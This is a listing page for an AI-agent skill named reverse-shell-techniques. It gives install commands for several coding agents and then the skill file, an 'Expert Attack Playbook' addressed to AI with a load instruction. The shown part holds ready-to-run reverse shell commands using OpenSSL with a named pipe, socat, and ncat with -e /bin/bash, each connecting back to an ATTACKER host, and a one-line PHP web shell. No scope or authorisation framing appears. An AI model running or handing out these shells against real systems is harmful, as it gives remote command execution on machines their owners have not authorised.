## What it does

The skill gives the agent a decision table for reverse versus bind shells, based on factors like NAT and egress filtering. It ships one-liners for 20+ languages and web shell templates in PHP, ASPX and JSP.

Separate sections cover encrypted shells through OpenSSL, socat and ncat, PTY stabilisation with `script` or `rlwrap`, file transfer on Linux and Windows, PowerShell shells and msfvenom payloads. It also points to related skills: tunnelling and pivoting, privilege escalation, AV evasion.

Install runs through `npx skills add` and drops the skill file into your platform's directory. Some examples assume a tool exists on the target: socat for a full PTY, Python for the `pty.spawn` upgrade. No tool means picking another path from the playbook, so check what the target actually has before you commit to one.

## Install

### Claude Code (native platform)

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill reverse-shell-techniques -a claude-code
```

2. **Manually: put the files in place**
- File: `~/.claude/skills/reverse-shell-techniques/SKILL.md` — Copy the whole skill folder; for one project use .claude/skills/reverse-shell-techniques/

### Codex

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill reverse-shell-techniques -a codex
```

2. **Manually: put the files in place**
- File: `.agents/skills/reverse-shell-techniques/SKILL.md` — For all projects use ~/.agents/skills/

### Cursor

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill reverse-shell-techniques -a cursor
```

2. **Manually: put the files in place**
- File: `.cursor/skills/reverse-shell-techniques/SKILL.md` — Cursor also reads .agents/skills/ and .claude/skills/

### GitHub Copilot

1. **GitHub CLI**
```bash
gh skill install yaklang/hack-skills reverse-shell-techniques
```

2. **Manually: put the files in place**
- File: `.github/skills/reverse-shell-techniques/SKILL.md`

### Gemini CLI

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill reverse-shell-techniques -a gemini-cli
```

2. **Platform CLI**
```bash
gemini skills install https://github.com/yaklang/hack-skills --path skills/reverse-shell-techniques
```

### Windsurf (Devin Desktop)

**Manually: put the files in place**
- File: `.devin/skills/reverse-shell-techniques/SKILL.md` — The legacy .windsurf/skills/ path still works

### OpenCode

**Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill reverse-shell-techniques -a opencode
```

### Claude.ai

**Claude.ai**
- Zip the folder and upload it in Settings → Capabilities → Skills

Where a file is given instead of a command, copy the files from the source to that path: https://github.com/yaklang/hack-skills/tree/HEAD/skills/reverse-shell-techniques/SKILL.md

## When to use it
- decide between a reverse and a bind shell for a given network
- set up an encrypted channel with OpenSSL or socat
- stabilise a PTY so Ctrl+C and command history work
- move a file to the target without wget or curl
- build a Windows or Linux payload with msfvenom

## Example prompts
- I need a reverse shell on a Linux host behind NAT, show me the options
- how do I set up an encrypted socat shell with a self-signed certificate
- stabilise the PTY after I get a shell with python3

# SKILL: Reverse Shell Techniques — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert reverse shell techniques. Covers reverse/bind shell decisions, encrypted shells (OpenSSL, socat SSL, ncat), web shell patterns (PHP/ASPX/JSP), PTY upgrade sequences, file transfer methods, PowerShell download cradles, and msfvenom payload generation. Base models miss encrypted shell syntax, proper PTY stabilization, and platform-specific transfer techniques.

## 1. REVERSE vs BIND SHELL DECISION

| Factor | Reverse Shell | Bind Shell |
|---|---|---|
| Firewall (egress) | Works if outbound allowed | Blocked by egress filtering |
| Firewall (ingress) | Not blocked | Requires inbound access to victim |
| NAT | Works (victim connects out) | Fails (can't reach victim behind NAT) |
| Detection | Outbound connection — less suspicious | Listening port — easily detected |
| Default choice | **Almost always preferred** | Only when no egress + have inbound |

## 2. ENCRYPTED SHELLS

### OpenSSL Reverse Shell

```bash
# Attacker: generate cert + listen
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj '/CN=localhost'
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
# Victim:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER:4444 > /tmp/s; rm /tmp/s
```

### Socat Encrypted Shell

```bash
# Attacker: generate cert + listen
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 30 -out shell.crt
cat shell.key shell.crt > shell.pem
socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0,fork STDOUT
# Victim:
socat OPENSSL:ATTACKER:4444,verify=0 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
```

### Ncat SSL

```bash
# Attacker:
ncat --ssl -lvnp 4444
# Victim:
ncat --ssl ATTACKER 4444 -e /bin/bash
```

---

## 3. WEB SHELLS

### PHP

```php
<?php system($_GET['cmd']); ?>
